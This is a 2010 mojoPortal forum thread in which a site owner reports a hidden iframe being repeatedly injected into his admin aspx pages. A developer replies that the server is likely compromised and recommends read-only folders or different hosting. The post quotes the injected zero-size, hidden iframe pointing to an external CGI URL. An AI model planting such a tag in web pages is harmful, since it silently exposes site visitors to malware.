prevent iframe tags in admin pages

This forum is only for questions or discussions about working with the mojoPortal source code in Visual Studio, obtaining the source code from the repository, developing custom features, etc. If your question is not along these lines this is not the right forum. Please try to post your question in the appropriate forum.

Please do not post questions about design, CSS, or skinning here. Use the Help With Skins Forum for those questions.

This forum is for discussing mojoPortal development

This forum is only for questions or discussions about working with the mojoPortal source code in Visual Studio, obtaining the source code from the repository, developing custom features, etc. If your question is not along these lines this is not the right forum. Please try to post your question in the appropriate forum.

You can monitor commits to the repository from this page. We also recommend developers to subscribe to email notifications in the developer forum as occasionally important things are announced.

Before posting questions here you might want to review the developer documentation.

Do not post questions about design, CSS, or skinning here. Use the Help With Skins Forum for those questions.
This thread is closed to new posts. You must sign in to post in the forums.
1/3/2010 9:47:15 PM
Tomas
Gravatar
Total Posts 22
View Posts

prevent iframe tags in admin pages

Hello mojo users,

I wonder how the iframe tags are injected in the admin pages. everytime i cleaned the aspx files in the admin folder the iframe tag keeps going back

<iframe omijw='F1FZmj9I' src='http://liveiframe.net/s/in.cgi?7 ' xqhea='kK24zffW' width='0' height='0' style='display:none'></iframe>.

Im uploading files directly to cpanel and not using ftp anymore since this is a possible cause for cross site scripting. 

Any suggestion please.. 

Thank you

1/4/2010 6:19:21 AM
Joe Audette
Gravatar
Total Posts 18439
View Posts

Re: prevent iframe tags in admin pages

If the server is not properly secured there can be some rogue app running on the same server as your site that is able to write to the file system in your web site. I would get different hosting because it sounds like your server is not properly configured to prevent this and the server itself may be compromised by malware.

In mojoPortal, the only folders that need to be writable are /App_Data and /Data. All other folders including the /Admin folder should be configured as read only.

Best,

Joe

You must sign in to post in the forums. This thread is closed to new posts.